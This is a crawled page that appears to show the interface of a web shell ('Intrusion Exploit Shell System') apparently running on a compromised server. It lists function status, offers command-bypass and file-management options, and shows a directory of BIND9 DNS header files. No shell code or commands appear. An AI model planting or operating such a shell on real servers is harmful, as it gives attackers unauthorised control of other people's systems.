[ Intrusion Exploit Shell System ]
[ Function mail() ] : [ ON ]
[ Function putenv() ] : [ ON ]

DIR: //usr/include/bind9/dns / [ GO Home ]



Command BYPASS
Command BIASA
Create Folder
Create File

Item Name
Size
Date
Permissions
View
Delete
Rename
. 12288 2024-08-21 02:13:42 0755
.. 4096 2024-08-21 02:13:54 0755
acache.h 14232 2024-08-19 22:36:46 0644
acl.h 7242 2024-08-19 22:36:46 0644
adb.h 22595 2024-08-19 22:36:46 0644
badcache.h 3369 2024-08-19 22:36:46 0644
bit.h 807 2024-08-19 22:36:46 0644
byaddr.h 4002 2024-08-19 22:36:46 0644
cache.h 8643 2024-08-19 22:36:46 0644
callbacks.h 2271 2024-08-19 22:36:46 0644
catz.h 11833 2024-08-19 22:36:46 0644
cert.h 1466 2024-08-19 22:36:46 0644
client.h 22042 2024-08-19 22:36:46 0644
clientinfo.h 2006 2024-08-19 22:36:46 0644
compress.h 6646 2024-08-19 22:36:46 0644
db.h 46567 2024-08-19 22:36:46 0644
dbiterator.h 7422 2024-08-19 22:36:46 0644
dbtable.h 3165 2024-08-19 22:36:46 0644
diff.h 6980 2024-08-19 22:36:46 0644
dispatch.h 16427 2024-08-19 22:36:46 0644
dlz.h 10618 2024-08-19 22:36:46 0644
dlz_dlopen.h 4677 2024-08-19 22:36:46 0644
dns64.h 5635 2024-08-19 22:36:46 0644
dnssec.h 12115 2024-08-19 22:36:46 0644
dnstap.h 9364 2024-08-19 22:36:46 0644
ds.h 1225 2024-08-19 22:36:46 0644
dsdigest.h 1722 2024-08-19 22:36:46 0644
dyndb.h 4835 2024-08-19 22:36:46 0644
ecdb.h 809 2024-08-19 22:36:46 0644
edns.h 722 2024-08-19 22:36:46 0644
enumclass.h 1220 2024-08-19 22:36:46 0644
enumtype.h 8300 2024-08-19 22:36:46 0644
events.h 4059 2024-08-19 22:36:46 0644
fixedname.h 1663 2024-08-19 22:36:46 0644
forward.h 3452 2024-08-19 22:36:46 0644
geoip.h 2792 2024-08-19 22:36:46 0644
ipkeylist.h 2186 2024-08-19 22:36:46 0644
iptable.h 1621 2024-08-19 22:36:46 0644
journal.h 8227 2024-08-19 22:36:46 0644
keydata.h 1059 2024-08-19 22:36:46 0644
keyflags.h 1278 2024-08-19 22:36:46 0644
keytable.h 9462 2024-08-19 22:36:46 0644
keyvalues.h 4159 2024-08-19 22:36:46 0644
lib.h 1192 2024-08-19 22:36:46 0644
log.h 3964 2024-08-19 22:36:46 0644
lookup.h 2924 2024-08-19 22:36:46 0644
master.h 11289 2024-08-19 22:36:46 0644
masterdump.h 12647 2024-08-19 22:36:46 0644
message.h 38832 2024-08-19 22:36:46 0644
name.h 37115 2024-08-19 22:36:46 0644
ncache.h 4929 2024-08-19 22:36:46 0644
nsec.h 2928 2024-08-19 22:36:46 0644
nsec3.h 8032 2024-08-19 22:36:46 0644
nta.h 4548 2024-08-19 22:36:46 0644
opcode.h 1007 2024-08-19 22:36:46 0644
order.h 1999 2024-08-19 22:36:46 0644
peer.h 5966 2024-08-19 22:36:46 0644
portlist.h 2101 2024-08-19 22:36:46 0644
private.h 1935 2024-08-19 22:36:46 0644
rbt.h 40618 2024-08-19 22:36:46 0644
rcode.h 2481 2024-08-19 22:36:46 0644
rdata.h 21613 2024-08-19 22:36:46 0644
rdataclass.h 2257 2024-08-19 22:36:46 0644
rdatalist.h 2569 2024-08-19 22:36:46 0644
rdataset.h 21147 2024-08-19 22:36:46 0644
rdatasetiter.h 3926 2024-08-19 22:36:46 0644
rdataslab.h 4384 2024-08-19 22:36:46 0644
rdatastruct.h 61584 2024-08-19 22:36:46 0644
rdatatype.h 2298 2024-08-19 22:36:46 0644
request.h 11156 2024-08-19 22:36:46 0644
resolver.h 20227 2024-08-19 22:36:46 0644
result.h 9284 2024-08-19 22:36:46 0644
rootns.h 892 2024-08-19 22:36:46 0644
rpz.h 10335 2024-08-19 22:36:46 0644
rriterator.h 4230 2024-08-19 22:36:46 0644
rrl.h 6640 2024-08-19 22:36:46 0644
sdb.h 7224 2024-08-19 22:36:46 0644
sdlz.h 14214 2024-08-19 22:36:46 0644
secalg.h 1706 2024-08-19 22:36:46 0644
secproto.h 1557 2024-08-19 22:36:46 0644
soa.h 2186 2024-08-19 22:36:46 0644
ssu.h 8308 2024-08-19 22:36:46 0644
stats.h 13451 2024-08-19 22:36:46 0644
tcpmsg.h 3145 2024-08-19 22:36:46 0644
time.h 1695 2024-08-19 22:36:46 0644
timer.h 1051 2024-08-19 22:36:46 0644
tkey.h 7631 2024-08-19 22:36:46 0644
tsec.h 2949 2024-08-19 22:36:46 0644
tsig.h 8384 2024-08-19 22:36:46 0644
ttl.h 1945 2024-08-19 22:36:46 0644
types.h 14158 2024-08-19 22:36:46 0644
update.h 1653 2024-08-19 22:36:46 0644
validator.h 7161 2024-08-19 22:36:46 0644
version.h 868 2024-08-19 22:36:46 0644
view.h 35274 2024-08-19 22:36:46 0644
xfrin.h 2924 2024-08-19 22:36:46 0644
zone.h 60864 2024-08-19 22:36:46 0644
zonekey.h 777 2024-08-19 22:36:46 0644
zt.h 5562 2024-08-19 22:36:46 0644